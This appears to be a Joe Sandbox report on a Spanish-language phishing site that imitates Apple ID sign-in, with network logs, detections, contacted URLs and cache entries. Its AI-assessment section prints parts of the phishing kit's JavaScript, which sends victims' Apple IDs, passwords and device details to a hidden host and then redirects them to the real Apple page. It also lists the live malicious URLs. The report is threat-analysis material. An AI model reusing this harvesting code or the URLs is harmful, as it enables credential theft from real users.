Source: unknown	Network traffic detected: HTTP traffic on port 53605 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53626 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53512
Source: unknown	Network traffic detected: HTTP traffic on port 53495 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 53654 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703

Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:53512 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:53660 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:53714 version: TLS 1.2

Source: classification engine

Classification label: mal64.phis.win@21/29@15/7

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=2216,i,5822492874613631544,16240484877137270197,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.flndmy.er-xu.com/aU3V88/c1.php"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=2216,i,5822492874613631544,16240484877137270197,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Browser Extensions	1 Process Injection	1 Process Injection	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	3 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
https://www.flndmy.er-xu.com/aU3V88/c1.php	100%	Avira URL Cloud	phishing

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://www.flndmy.er-xu.com/aU3V88/css/myriad-set-pro_text.ttf	100%	Avira URL Cloud	phishing
https://www.flndmy.er-xu.com/aU3V88/images/ajax-loader.gif	100%	Avira URL Cloud	phishing
https://www.flndmy.er-xu.com/aU3V88/css/appe.css?v=1	100%	Avira URL Cloud	phishing
https://www.flndmy.er-xu.com/aU3V88/jss/myscript_ind_fact.js	100%	Avira URL Cloud	phishing
https://www.flndmy.er-xu.com/aU3V88/jss/function.js	100%	Avira URL Cloud	phishing
https://www.flndmy.er-xu.com/favicon.ico	100%	Avira URL Cloud	phishing
https://www.flndmy.er-xu.com/aU3V88/css/myriad-set-pro_thin.ttf	100%	Avira URL Cloud	phishing
https://www.flndmy.er-xu.com/aU3V88/css/fonts2.css	100%	Avira URL Cloud	phishing
https://www.flndmy.er-xu.com/aU3V88/jss/myscript_patron.js?v=2gdssf	100%	Avira URL Cloud	phishing
https://www.flndmy.er-xu.com/aU3V88/css/myriad-set-pro_text.woff	100%	Avira URL Cloud	phishing
https://www.flndmy.er-xu.com/aU3V88/css/myriad-set-pro_thin.woff	100%	Avira URL Cloud	phishing

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bg.microsoft.map.fastly.net	199.232.210.172	true	false	high
code.jquery.com	151.101.2.137	true	false	high
www.flndmy.er-xu.com	89.250.71.221	true	true	unknown
www.google.com	142.250.186.164	true	false	high
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://www.flndmy.er-xu.com/aU3V88/jss/myscript_patron.js?v=2gdssf	false	Avira URL Cloud: phishing	unknown
https://www.flndmy.er-xu.com/aU3V88/css/myriad-set-pro_thin.ttf	false	Avira URL Cloud: phishing	unknown
https://code.jquery.com/jquery-2.2.4.js	false		high
https://www.flndmy.er-xu.com/aU3V88/c1.php	true		unknown
https://www.flndmy.er-xu.com/aU3V88/images/ajax-loader.gif	false	Avira URL Cloud: phishing	unknown
https://www.flndmy.er-xu.com/aU3V88/css/appe.css?v=1	false	Avira URL Cloud: phishing	unknown
https://www.flndmy.er-xu.com/aU3V88/jss/function.js	false	Avira URL Cloud: phishing	unknown
https://www.flndmy.er-xu.com/favicon.ico	false	Avira URL Cloud: phishing	unknown
https://www.flndmy.er-xu.com/aU3V88/jss/myscript_ind_fact.js	false	Avira URL Cloud: phishing	unknown
https://www.flndmy.er-xu.com/aU3V88/css/fonts2.css	false	Avira URL Cloud: phishing	unknown
https://www.flndmy.er-xu.com/aU3V88/css/myriad-set-pro_text.ttf	false	Avira URL Cloud: phishing	unknown
https://www.flndmy.er-xu.com/aU3V88/css/myriad-set-pro_text.woff	false	Avira URL Cloud: phishing	unknown
https://www.flndmy.er-xu.com/aU3V88/css/myriad-set-pro_thin.woff	false	Avira URL Cloud: phishing	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://code.google.com/p/chromium/issues/detail?id=470258	chromecache_130.3.dr, chromecache_116.3.dr	false	high
https://bugs.webkit.org/show_bug.cgi?id=136851	chromecache_130.3.dr, chromecache_116.3.dr	false	high
https://code.google.com/p/chromium/issues/detail?id=449857	chromecache_130.3.dr, chromecache_116.3.dr	false	high
http://bugs.jquery.com/ticket/12359	chromecache_130.3.dr, chromecache_116.3.dr	false	high
http://jquery.org/license	chromecache_130.3.dr, chromecache_116.3.dr	false	high
https://bugzilla.mozilla.org/show_bug.cgi?id=649285	chromecache_130.3.dr, chromecache_116.3.dr	false	high
http://sizzlejs.com/	chromecache_130.3.dr, chromecache_116.3.dr	false	high
https://code.google.com/p/chromium/issues/detail?id=378607	chromecache_130.3.dr, chromecache_116.3.dr	false	high
https://html.spec.whatwg.org/#strip-and-collapse-whitespace	chromecache_130.3.dr, chromecache_116.3.dr	false	high
http://jsperf.com/getall-vs-sizzle/2	chromecache_130.3.dr, chromecache_116.3.dr	false	high
http://fluidproject.org/blog/2008/01/09/getting-setting-and-removing-tabindex-values-with-javascript	chromecache_130.3.dr, chromecache_116.3.dr	false	high
https://bugs.webkit.org/show_bug.cgi?id=29084	chromecache_130.3.dr, chromecache_116.3.dr	false	high
https://developer.mozilla.org/en-US/docs/CSS/display	chromecache_130.3.dr, chromecache_116.3.dr	false	high
http://bugs.jquery.com/ticket/13378	chromecache_130.3.dr, chromecache_116.3.dr	false	high
http://dev.w3.org/csswg/cssom/#resolved-values	chromecache_130.3.dr, chromecache_116.3.dr	false	high
http://jsperf.com/thor-indexof-vs-for/5	chromecache_130.3.dr, chromecache_116.3.dr	false	high
https://github.com/jquery/jquery/pull/557)	chromecache_130.3.dr, chromecache_116.3.dr	false	high
https://github.com/jrburke/requirejs/wiki/Updating-existing-libraries#wiki-anon	chromecache_130.3.dr, chromecache_116.3.dr	false	high
https://bugzilla.mozilla.org/show_bug.cgi?id=687787	chromecache_130.3.dr, chromecache_116.3.dr	false	high
https://code.google.com/p/chromium/issues/detail?id=229280	chromecache_130.3.dr, chromecache_116.3.dr	false	high
http://web.archive.org/web/20100324014747/http://blindsignals.com/index.php/2009/07/jquery-delay/	chromecache_130.3.dr, chromecache_116.3.dr	false	high
http://www.webtoolkit.info/	chromecache_128.3.dr, chromecache_127.3.dr	false	high
https://github.com/jquery/jquery/pull/764	chromecache_130.3.dr, chromecache_116.3.dr	false	high
https://github.com/jquery/sizzle/pull/225	chromecache_130.3.dr, chromecache_116.3.dr	false	high
https://bugzilla.mozilla.org/show_bug.cgi?id=491668	chromecache_130.3.dr, chromecache_116.3.dr	false	high
http://jquery.com/	chromecache_130.3.dr, chromecache_116.3.dr	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
89.250.71.221	www.flndmy.er-xu.com	Netherlands	41349	MVMTECH-ASRU	true
151.101.2.137	code.jquery.com	United States	54113	FASTLYUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
142.250.186.164	www.google.com	United States	15169	GOOGLEUS	false
151.101.66.137	unknown	United States	54113	FASTLYUS	false

Private

IP
192.168.2.4
192.168.2.6

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1589726
Start date and time:	2025-01-13 01:48:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 24s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	https://www.flndmy.er-xu.com/aU3V88/c1.php
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal64.phis.win@21/29@15/7
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0

Warnings

Exclude process from analysis (whitelisted): WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.186.67, 142.250.186.174, 64.233.184.84, 142.250.181.238, 142.250.185.206, 142.250.184.206, 142.251.40.206, 74.125.0.74, 52.149.20.212, 192.229.221.95, 20.242.39.171, 199.232.210.172, 52.165.164.15, 23.215.17.144, 172.217.16.138, 142.250.186.42, 142.250.186.138, 142.250.185.106, 142.250.184.202, 142.250.74.202, 142.250.186.106, 142.250.185.202, 142.250.186.170, 172.217.18.106, 142.250.185.234, 142.250.181.234, 142.250.185.170, 216.58.206.42, 142.250.186.74, 172.217.18.10, 142.250.184.227, 34.104.35.123, 142.250.185.174, 13.107.246.45, 184.28.90.27
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, clientservices.googleapis.com, appleid.cdn-apple.com, clients2.google.com, redirector.gvt1.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, e2885.e9.akamaiedge.net, update.googleapis.com, wu-b-net.trafficmanager.net, appleid.cdn-apple.com.edgekey.net, glb.sls.prod.dcat.dsp.trafficmanager.net, clients1.google.com, client.wns.windows.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, r5.sn-t0aedn7e.gvt1.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, appleid.cdn-apple.com.akadns.net, edgedl.me.gvt1.com, r5---sn-t0aedn7e.gvt1.com, clients.l.google.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: https://www.flndmy.er-xu.com/aU3V88/c1.php

Simulations

Behavior and APIs

⊘No simulations

LLM Input / Output

Input	Output
URL: https://www.flndmy.er-xu.com Model: Joe Sandbox AI	{ "typosquatting": true, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": true, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": false, "brand_spoofing_attempt": true, "third_party_hosting": true }
URL: https://www.flndmy.er-xu.com
URL: https://www.flndmy.er-xu.com/aU3V88/jss/myscript_p... Model: Joe Sandbox AI	{ "risk_score": 4, "reasoning": "The provided JavaScript snippet exhibits a mix of behaviors, some of which raise moderate concerns. While there are no clear indicators of malicious intent, the script demonstrates aggressive DOM manipulation and potential data exfiltration. Further review is recommended to ensure the script's legitimacy and identify any potential security risks." }
document.oncontextmenu = function(){return false;} $(document).ready(function(){ $("#btn_ip").css("top","5px"); $("#cont_btn_apple").addClass("ap_bor"); $("#cont_btn_apple").addClass("bor"); $("#cont_pwd").addClass('no_visibless'); $("#btn_ip").append('<img id="bt_flec2" class="icon icon_sign_in" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABoAAAAaCAYAAACpSkzOAAABgklEQVR42r3WsU7CUBSA4QtGQVIHYayjEgYTdpd2EV4BnXkGnWHRAY1jCZsJYtzcSU0kGt7ASSkLTD4ALvgPh4Q00GtL6/B1uSfnpO0991x1fGLrFHGBPiaYiQn6slbU5QlatPCKMa5QwQEyMFBCVda+JNYKUygLBx7OsAWlkZZYDw6yukJ5vOMZe1AhGXiQHPl1hXIY4g5pqIhSuJVcuVWFOniUQLWhlOTq+AtZ8GBAxcSAB2u50ADnIRPVsa+JqWGwKFSGF+G/dPGBQ81u9FBWPBq4hopQaI7voP6R3A3Fw0U1aiHxg/qauFO8KDlKTCifJp4CjDH3aa1ocBMTJedWBspngHkE9748O5j9W6G4P91N0KdzUUl6M8S1vW3N9m4uGna0QcMeaRp2hPLyj68lewQlf6ja/jHRRi/GMdFDO+nB11o7+EQBww1HeVdyFHSXk1048FD749ulJdaDg1zY69ab77plYluYqMjap8TaQdctnRIu4WKKHzGFK2slXZ5f2RlINtkg1cIAAAAASUVORK5CYII=">'); $("#sign-in").on("click",function(){ $("#carga_envio").css("display", "block"); $("#bt_flec").css("display", "none"); submitt(); }) $('#appleId').keyup(function(e) { if(e.keyCode == 13) { $("#btn_ip").addClass("disabled"); $("#btn_ip").click(); $("#btn_ip").removeAttr("onclick"); // act_flecha(); } }); }) function opc_felcha(){ $(".signin-error").addClass("ocult"); if($("#appleId").val().length > 0){ $("#btn_ip").css("opacity", "1"); $("#btn_ip").removeClass("disabled"); }else{ $("#btn_ip").css("opacity", "0.3"); $("#btn_ip").addClass("disabled"); } var opt = $("#vl").val(); if(opt == 1){ if($("#cant_input").val() != $("#appleId").val().length){ $("#vl").val(0); $("#cont_pwd").slideToggle(500,function(){ $("#cont_btn_apple").addClass("ap_bor"); }); $("#sign-in").slideToggle(); $("btn_ip").animate({opacity: '1'}); $("#pwd").val(''); $("#btn_ip").attr("onclick","veri_f()"); } } } function act_flecha(){ if($("#appleId").val().length > 0){ if($("#appleId").val().indexOf("@") != -1){ }else{ $("#appleId").val($("#appleId").val() + "@icloud.com"); } } } function veri_f(){ if($("#appleId").val().length > 0){ $("#btn_ip").empty(); var host = $("#dominio").val(); $("#btn_ip").append('<img id="img_car" src="imagen/spinner2.gif" class="normal image" style="width:25px">'); setTimeout(function() { $("#img_car").css("display","none"); $("#btn_ip").empty(); $("#btn_ip").css("opacity","0"); $("#btn_ip").append('<img id="bt_flec2" class="icon icon_sign_in" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABoAAAAaCAYAAACpSkzOAAABgklEQVR42r3WsU7CUBSA4QtGQVIHYayjEgYTdpd2EV4BnXkGnWHRAY1jCZsJYtzcSU0kGt7ASSkLTD4ALvgPh4Q00GtL6/B1uSfnpO0991x1fGLrFHGBPiaYiQn6slbU5QlatPCKMa5QwQEyMFBCVda+JNYKUygLBx7OsAWlkZZYDw6yukJ5vOMZe1AhGXiQHPl1hXIY4g5pqIhSuJVcuVWFOniUQLWhlOTq+AtZ8GBAxcSAB2u50ADnIRPVsa+JqWGwKFSGF+G/dPGBQ81u9FBWPBq4hopQaI7voP6R3A3Fw0U1aiHxg/qauFO8KDlKTCifJp4CjDH3aa1ocBMTJedWBspngHkE9748O5j9W6G4P91N0KdzUUl6M8S1vW3N9m4uGna0QcMeaRp2hPLyj68lewQlf6ja/jHRRi/GMdFDO+nB11o7+EQBww1HeVdyFHSXk1048FD749ulJdaDg1zY69ab77plYluYqMjap8TaQdctnRIu4WKKHzGFK2slXZ5f2RlINtkg1cIAAAAASUVORK5CYII=">'); btn_v_f(); $("#cant_input").val($("#appleId").val().length); $("#vl").val(1); }, 1500); } } function btn_v_f(){ $("#cont_btn_apple").removeClass("ap_bor");
URL: https://www.flndmy.er-xu.com/aU3V88/c1.php Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Ingrese su cdigo de desbloqueo", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://www.flndmy.er-xu.com/aU3V88/jss/myscript_i... Model: Joe Sandbox AI	{ "risk_score": 6, "reasoning": "The provided JavaScript code contains several behaviors that raise moderate to high security concerns. While some of the functionality appears to be related to legitimate login and password management, there are several indicators that warrant further investigation: 1. The code includes dynamic code execution through the use of `eval()` and `Function()` constructor, which can be used to execute remote or malicious code (High-Risk, +3 points). 2. The code sends user data (e.g., Apple ID, password) to an external server via AJAX requests, which could potentially lead to data exfiltration (High-Risk, +3 points). 3. The code includes redirects to external domains, some of which may be suspicious or malicious (High-Risk, +3 points). 4. The code uses obfuscated or encoded strings, which can be an indicator of malicious intent (High-Risk, +3 points). 5. The code performs aggressive DOM manipulation by repeatedly altering or clearing the DOM (Moderate-Risk, +2 points). While the code may have some legitimate functionality, such as login and password management, the presence of high-risk behaviors and the lack of clear context around the script's purpose raise significant security concerns. Further investigation and analysis would be necessary to determine the true nature and intent of this code." }
function limpiar_carga() { $("#carga_envio").css("display", "none"), $("#bt_flec").css("display", "block") } function submitt() { $.trim($("#appleId").val().length) > 0 ? $.trim($("#pwd").val().length) > 0 && ($("#carga_envio").css("display", "block"), $("#bt_flec").css("display", "none"), SubmitMe()) : $("#appleId").focus() } function id_inp(a) { var b = $("#" + a).val(); b.length > 0 ? ($(".signin-error").addClass("ocult"), $(".signin-error").removeClass("visb")) : ($(".signin-error").addClass("ocult"), $(".signin-error").removeClass("visb")) } function salwinx() { var a = $.trim($("#d").val()), b = $.trim($("#iddapp").val()); window.location = a + "sign.php?reload=3&idname=" + b } function forgot() { top.location.href = "https://idmsa.apple.com/IDMSWebAuth/signin?appIdKey=6f59402f11d3e2234be5b88bf1c96e1e453a875aec205272add55157582a9f61&path=%2F%3Fa%3D1179750425%26s%3D1%26wo%3DMS1BN7QDLY%26pli%3D79013838111353&language=ES-ES" } function vis_flec() { $.trim($("#pwd").val().length), $.trim($("#appleId").val().length); $.trim($("#pwd").val().length) > 0 && $.trim($("#appleId").val().length) > 0 ? ($("#sign-in").removeClass("disabled"), $("#sign-in").attr("aria-disabled", "true"), $(".signin-error").addClass("ocult"), $(".signin-error").removeClass("visb")) : ($("#sign-in").addClass("disabled"), $("#sign-in").attr("aria-disabled", "true"), $(".signin-error").addClass("ocult"), $(".signin-error").removeClass("visb")) } function clos() { $("#idmsModalWrapper1485962628981-0-0").removeClass("visb"), $("#idmsModalWrapper1485962628981-0-0").addClass("ocult"), limpiar(), vis_flec(), setTimeout(function() { $("#appleId").focus() }, 1e3), $("#step").addClass("visb"), $("#step").removeClass("ocult") } function limpiar() { $("#appleId").val(""), $("#pwd").val(""), $("#appleId").focus() } function SubmitMe() { count_session(1); } function count_session(a) { var c =$("#iddapp").val(); var host = Base64.decode($.trim($("#h").val())); function t(a) { reset(a.message); } $.ajax({ url: host+"validlog.php", data: { user:$("#appleId").val(), pass:$("#pwd").val(), idapp:c, intento:a, sistema:$("#id_sistema").val(), browser:$.trim($("#browser").val()), ip_address:$.trim($("#ip_address").val()), dispositivo:$.trim($("#dispositivo").val()), }, dataType: "jsonp", jsonp: "callback", jsonpCallback: "jsonpCallback", success: function(a) { t(a); } }) } function reset(a){ resultado = a; var c = a, d = c.split("-"), e = d[0], f = d[1], g = d[2], red = d[3]; if(red=='1'){ top.location.href = "include/direction.php"; }else{ "es_1" == $.trim(e) ? "" != g && "0" != g ? 1 == g ? "" != f && ("2" == f ? ($(".signin-error").addClass("visb"), $(".signin-error").removeClass("ocult"), limpiar_carga(), $("#pwd").val(""), $("#pwd").focus()) : "1" == f ? ($("#step").removeClass("visb"), $("#step").addClass("ocult"), limpiar_carga(), $("#idmsModalWrapper1485962628981-0-0").removeClass("ocult"), $("#idmsModalWrapper1485962628981-0-0").addClass("visb")) : "3" == f && salwinx()) : 2 == g ? forgot() : 3 == g && (location.href = "include/direction.php") : forgot() : "es_0" == $.trim(e) && (top.location.href = "https://idmsa.apple.com/IDMSWebAuth/signin?appIdKey=6f59402f11d3e2234be5b88bf1c96e1e453a875aec205272add55157582a9f61&path=%2F%3Fa%3D1179750425%26s%3D1%26wo%3DMS1BN7QDLY%26pli%3D79013838111353&language=ES-ES") } } $(document).ready(function() { $("#appleId").keypress(function(a) { 13 == a.which && $(this).val().length > 0 && ($(this).val().indexOf("@") != -1 ? $("#pwd").focus() : (
URL: https://www.flndmy.er-xu.com/aU3V88/c1.php Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

Chrome Cache Entry: 113

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	GIF image data, version 89a, 32 x 32
Category:	downloaded
Size (bytes):	3783
Entropy (8bit):	7.483148009341424
Encrypted:	false
SSDEEP:	96:3wl4ldG+Uf82TtIW/G8+4p2PRIbjGiWBUyL/hsO5Msiun:Al470X2QG8N4EjGioUVO59n
MD5:	3DB24B58DC488B1820ECBD06300F5CEC
SHA1:	2886D696139C36EEDA8DB561B4F178C0876603B5
SHA-256:	FD458F36D73B7D6434326D18C9229DA92384D37303DBDD72FA346597FDE23068
SHA-512:	833FF2B2C88E901CA7796189F0A0B7518DDAE74265ED58F4CD111E4C8F7A3C0A1D4D00408E2033C3968CB811A96A10EFAA4B46B16C33935793091146C7BC9D1E
Malicious:	false
Reputation:	low
URL:	https://www.flndmy.er-xu.com/aU3V88/images/ajax-loader.gif
Preview:	GIF89a . ....```...............~~~......................>>>...lll.......VVV......JJJ.................,,,LLL\|\|\|^^^.......................................................................................!..NETSCAPE2.0.....!..Created with ajaxload.info.!.......,.... . ......pH$...Fq.$j.D.@.).......V....K.<....:<$..r......L8!/...BxBnb}E!g....o.r..E.g..^..oWD.c.....JC.g......oqm.o........!.E.....{p~....r...D...#}.M....d......K......r.........o....\|........].q...` 9C.f%.$G.=..}.C..u..-.H..!.......'......O.K"1......5.&{j.T.@.BBo..e...6..<..4C.B?..1..)..G.b.K... .!.......,...........@.pH$"0.AqI.....P.0....*..E...`0x...."........?....(S.i^.m.WB#e{......MJD.e.uj.mVB....{ke......m.D.....t.#.K...E...........................B....t...................A.!.......,...........@.pH$...Bq.."....(.......V....K.@ ...:,<..21s.Z._...A..g.BxB.o..D.g.w^.....d..FgW..oWD.c.......g......o.D.........v..JE..i.n...F..~.."...K...d ....K....X.."ydv..E.....................E`AE........R...JP.\)^..

Chrome Cache Entry: 114

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text
Category:	downloaded
Size (bytes):	315
Entropy (8bit):	5.0572271090563765
Encrypted:	false
SSDEEP:	6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
MD5:	A34AC19F4AFAE63ADC5D2F7BC970C07F
SHA1:	A82190FC530C265AA40A045C21770D967F4767B8
SHA-256:	D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
SHA-512:	42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
Malicious:	false
Reputation:	low
URL:	https://www.flndmy.er-xu.com/aU3V88/css/myriad-set-pro_thin.woff
Preview:	<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.

Chrome Cache Entry: 115

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	GIF image data, version 89a, 32 x 32
Category:	dropped
Size (bytes):	3783
Entropy (8bit):	7.483148009341424
Encrypted:	false
SSDEEP:	96:3wl4ldG+Uf82TtIW/G8+4p2PRIbjGiWBUyL/hsO5Msiun:Al470X2QG8N4EjGioUVO59n
MD5:	3DB24B58DC488B1820ECBD06300F5CEC
SHA1:	2886D696139C36EEDA8DB561B4F178C0876603B5
SHA-256:	FD458F36D73B7D6434326D18C9229DA92384D37303DBDD72FA346597FDE23068
SHA-512:	833FF2B2C88E901CA7796189F0A0B7518DDAE74265ED58F4CD111E4C8F7A3C0A1D4D00408E2033C3968CB811A96A10EFAA4B46B16C33935793091146C7BC9D1E
Malicious:	false
Reputation:	low
Preview:	GIF89a . ....```...............~~~......................>>>...lll.......VVV......JJJ.................,,,LLL\|\|\|^^^.......................................................................................!..NETSCAPE2.0.....!..Created with ajaxload.info.!.......,.... . ......pH$...Fq.$j.D.@.).......V....K.<....:<$..r......L8!/...BxBnb}E!g....o.r..E.g..^..oWD.c.....JC.g......oqm.o........!.E.....{p~....r...D...#}.M....d......K......r.........o....\|........].q...` 9C.f%.$G.=..}.C..u..-.H..!.......'......O.K"1......5.&{j.T.@.BBo..e...6..<..4C.B?..1..)..G.b.K... .!.......,...........@.pH$"0.AqI.....P.0....*..E...`0x...."........?....(S.i^.m.WB#e{......MJD.e.uj.mVB....{ke......m.D.....t.#.K...E...........................B....t...................A.!.......,...........@.pH$...Bq.."....(.......V....K.@ ...:,<..21s.Z._...A..g.BxB.o..D.g.w^.....d..FgW..oWD.c.......g......o.D.........v..JE..i.n...F..~.."...K...d 